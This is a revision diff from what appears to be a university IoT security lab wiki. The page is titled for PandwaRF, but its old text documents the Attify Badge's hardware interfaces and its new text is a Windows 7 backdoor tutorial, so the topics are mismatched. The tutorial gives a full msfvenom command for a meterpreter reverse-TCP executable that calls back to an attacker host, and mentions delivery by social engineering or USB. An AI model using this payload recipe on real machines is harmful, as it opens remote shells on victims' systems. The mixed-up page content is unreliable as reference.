Difference between revisions of "PandwaRF"

From Embedded Lab Vienna for IoT & Security
Jump to navigation Jump to search
(OS backdoors)
Line 1: Line 1:
== Summary ==
== Summary ==
This documentation describes basic information about the Attify Badge. General functionalities / hardfacts about the Badge and a set up example, where the Badge is used to exploit an IoT Device.
This documentation describes how operating system backdoors can be created using the MSFvenom framework and what the attacker can do once he/she gains access to the victim machine. This particular attack takes advantage of the fact that the Windows 7 firewall by design only inspects the incoming traffic while the outgoing traffic is pretty much ignored. With this in mind one can create a reverse TCP payload, open a particular port and let the victim connect to that open port.  
== Introduction ==
== Introduction ==
 
MSFvenom is an easily manageable framework that can be used to quickly create Metasploit payloads.
Attify Badge is a dedicated hardware security assessment utility developed by Attify that enables communication between a PC and an embedded device over various hardware communication protocols.
The Attify Badge uses an FTDI chip that supports a variety of communication protocols and standards including UART, SPI, I2C, 1-Wire and JTAG.
This allows an interaction with any IoT/embedded device that has one or more hardware communication ports. It supports both 3.3V and 5V, making it suitable for a wide range of target devices.
 
== Requirements ==
== Requirements ==
Devices: Attify Badge, IoT Device
Devices: 2 devices --> 1 running Kali Linux (attacker) and 1 running Windows 7 (victim)
 
Operating system: Ubuntu OS
 
Software: Attify Badge Tool
 
== Supported Exploitation Interfaces ==
Universal Asynchronous Receiver Transmitter (UART)
 
Serial Peripheral Interface (SPI)
 
Joint Test Action Group (JTAG)
 
Inter-Integrated Circuit (I²C)
 
General Purpose Input/Output (GPIO)
 
== Exploit by UART ==
 
Register the external USB device connected to the system and add it to the combo box at the top left of the user interface.
 
Select the USB port to which the device is connected and the baud rate to be used.
 
Once you have selected the desired baud rate, press Enter to connect to the device. the data received from the UART device will be displayed in a black console window. You can use the input fields below it to interact with the device. In the combo box at the bottom right, you can select the line termination for each line you want to send to the device.
 
== Exploit by SPI ==
 
''Allows users to detect, read, write and erase SPI based memory of the target device connected to the Attify Badge.''
 
Select the desired operation from the drop-down menu.
 
For read/write commands, enter the path of the file where the data will be saved or read. An example of a path is ~/files/firmware.bin.
 
== Exploit by JTAG ==
Select the appropriate configuration file for the target device. (Custom configuration files can be placed directly in the cfg/ directory.)
 
Click "Start OpenOCD Server". Then you will see the message "Initializing OpenOCD Server in the background".
 
Click on the "Connect to OpenOCD Server" button to connect to the OpenOCD Server. This will launch a new terminal window with a Telnet session connected to the OpenOCD Server.
 
''For further analysis (for example, to find and exploit firmware vulnerabilities).
''Enter the path of the sprite file in the path edit box and click "Run GDB" (you will need the appropriate elf file).
''This will start a gdb session for the tool to analyze.''
 
== Exploit by I²C ==
''The I2C module can be used to find I2C devices and to read, write and erase the contents of I2C EEPROMs connected to the badge.''
 
To do so, simply select the action you want from the drop-down menu, enter the file path if necessary, and click the "Run" button.
 
== Exploit by GPIO ==


'''Output Mode:'''
== Exploit ==
Selecting the check box next to each terminal will change the status of that terminal to "High", and unchecking the box will change the status of that terminal to "Low".
1. On Kali Linux we will open up a new shell and create a reverse TCP payload with the help of MSFvenom in one single line:
'''msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.134 LPORT=6565 -f exe -o backdoor.exe.'''
With '''-p''' we specify which type of payload we want to create, '''LHOST''' and '''LPORT''' are basically the IP address and the port that we will open for our victim to connect to. '''-f exe''' specifies that the created payload is an executable file and '''-o''' specifies the name under which the file should be saved.


'''Input Mode'''
2. The next step is the hardest challenge and that would be to transfer the backdoor to the victim machine. This can be done in many ways (most often it is done by different social engineering toolkits) but for the sake of simplicity, you can use a USB.
If you want to use the pin in input mode, change the mode of the desired pin to input mode and check the box to enable the pin.


Click on the "Start input monitoring" button to start the input monitoring control.
3. Before executing the backdoor file on the victim machine, we need to setup a listener


Click the "Start" button in the "Input monitoring" widget to start monitoring the input of the selected pin.


https://blog.attify.com/content/images/2017/02/GPIO-input.png


== References ==
== References ==

Revision as of 12:17, 16 December 2021

Summary

This documentation describes how operating system backdoors can be created using the MSFvenom framework and what the attacker can do once he/she gains access to the victim machine. This particular attack takes advantage of the fact that the Windows 7 firewall by design only inspects the incoming traffic while the outgoing traffic is pretty much ignored. With this in mind one can create a reverse TCP payload, open a particular port and let the victim connect to that open port.

Introduction

MSFvenom is an easily manageable framework that can be used to quickly create Metasploit payloads.

Requirements

Devices: 2 devices --> 1 running Kali Linux (attacker) and 1 running Windows 7 (victim)

Exploit

1. On Kali Linux we will open up a new shell and create a reverse TCP payload with the help of MSFvenom in one single line: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.134 LPORT=6565 -f exe -o backdoor.exe. With -p we specify which type of payload we want to create, LHOST and LPORT are basically the IP address and the port that we will open for our victim to connect to. -f exe specifies that the created payload is an executable file and -o specifies the name under which the file should be saved.

2. The next step is the hardest challenge and that would be to transfer the backdoor to the victim machine. This can be done in many ways (most often it is done by different social engineering toolkits) but for the sake of simplicity, you can use a USB.

3. Before executing the backdoor file on the victim machine, we need to setup a listener


References

https://blog.attify.com/hack-iot-devices-embedded-exploitation/

https://blog.attify.com/hack-iot-device/

Retrieved from "https://wiki.elvis.science/index.php?title=PandwaRF&oldid=8193"